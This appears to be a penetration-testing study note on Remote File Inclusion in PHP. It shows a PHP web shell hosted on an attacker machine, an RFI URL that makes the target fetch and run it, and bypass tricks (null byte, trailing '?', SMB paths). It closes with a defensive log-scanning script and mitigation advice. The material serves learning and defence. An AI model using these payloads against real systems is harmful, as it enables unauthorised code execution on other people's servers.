# RFI - Remote File Inclusion

See PG Practice SLORT for an example of uploading a PHP reverse shell that executes simultaneously on Windows!

<https://securityxploded.com/remote-file-inclusion.php>


RFI is less common than LFI because the target has to be configured to allow including remote files; however, ALWAYS CHECK for it if you have found an LFI.

**Test payload:**

`http://10.11.0.22/menu.php?file=http://10.11.0.4/evil.txt`


The result would be an incoming connection on a `nc` listener.


**Exploiting:**

**Host the file with malicious PHP code:**

```
kali@kali:/var/www/html$ cat evil.txt
<?php echo shell_exec($_GET['cmd']); ?>
kali@kali:/var/www/html$ sudo systemctl restart apache2
```


**Call it with the RFI payload:**

```
http://10.11.0.22/menu.php?file=http://10.11.0.4/evil.txt&cmd=ipconfig
```


**Tricks:**

* Add a null byte (`%00`) to terminate the string and bypass a file-type upload restriction
* Append a `?` to the end of the payload to continue the string as if there isn't a payload
* If HTTP is excluded, try an SMB link instead
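
**Detection (added example):**

From the defending side, the test payload and the tricks above leave recognizable marks in the target's access log. The Python script below is an added example, not part of the original notes: it flags query parameters that carry a remote URL, a UNC/SMB path, a null byte, or a trailing `?`. The log lines are constructed (reusing the lab addresses from this page), and the function and indicator names are assumptions.

```python
import re
from urllib.parse import parse_qsl

# Constructed access-log lines (not real traffic); addresses reuse the page's lab hosts.
SAMPLE_LOG = [
    '10.11.0.4 - - [01/Jan/2024:10:00:00 +0000] "GET /menu.php?file=current_menu.php HTTP/1.1" 200 512',
    '10.11.0.4 - - [01/Jan/2024:10:00:05 +0000] "GET /menu.php?file=http://10.11.0.4/evil.txt&cmd=ipconfig HTTP/1.1" 200 734',
    '10.11.0.4 - - [01/Jan/2024:10:00:09 +0000] "GET /menu.php?file=http://10.11.0.4/evil.txt? HTTP/1.1" 200 120',
    '10.11.0.4 - - [01/Jan/2024:10:00:12 +0000] "GET /menu.php?file=%5C%5C10.11.0.4%5Cshare%5Cevil.txt%00 HTTP/1.1" 200 120',
]

# Client address and request target from a common/combined log format line.
REQUEST_RE = re.compile(r'^(\S+) .*?"[A-Z]+ (\S+) HTTP/[\d.]+"')
REMOTE_SCHEME = re.compile(r'^(?:https?|ftp|smb)://', re.IGNORECASE)


def rfi_indicators(value):
    """Return the RFI indicators present in one decoded parameter value."""
    found = []
    cleaned = value.replace('\x00', '').strip()
    if REMOTE_SCHEME.match(cleaned):
        found.append('remote_url')
        if cleaned.endswith('?'):
            found.append('trailing_question_mark')
    if cleaned.startswith(('\\\\', '//')):
        found.append('unc_path')
    if '\x00' in value:
        found.append('null_byte')
    return found


def scan(lines):
    """Return (client, parameter, indicators) for every suspicious parameter."""
    hits = []
    for line in lines:
        match = REQUEST_RE.match(line)
        if not match:
            continue
        client, target = match.groups()
        _, _, query = target.partition('?')
        # parse_qsl percent-decodes values, so %00 and %5C are seen decoded.
        for name, value in parse_qsl(query, keep_blank_values=True):
            found = rfi_indicators(value)
            if found:
                hits.append((client, name, found))
    return hits


if __name__ == '__main__':
    for client, name, found in scan(SAMPLE_LOG):
        print(f'{client} param={name} indicators={",".join(found)}')
```

On PHP, keeping `allow_url_include` set to `Off` (its default) and mapping the `file` parameter to an allowlist of local files removes the inclusion path these requests depend on.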
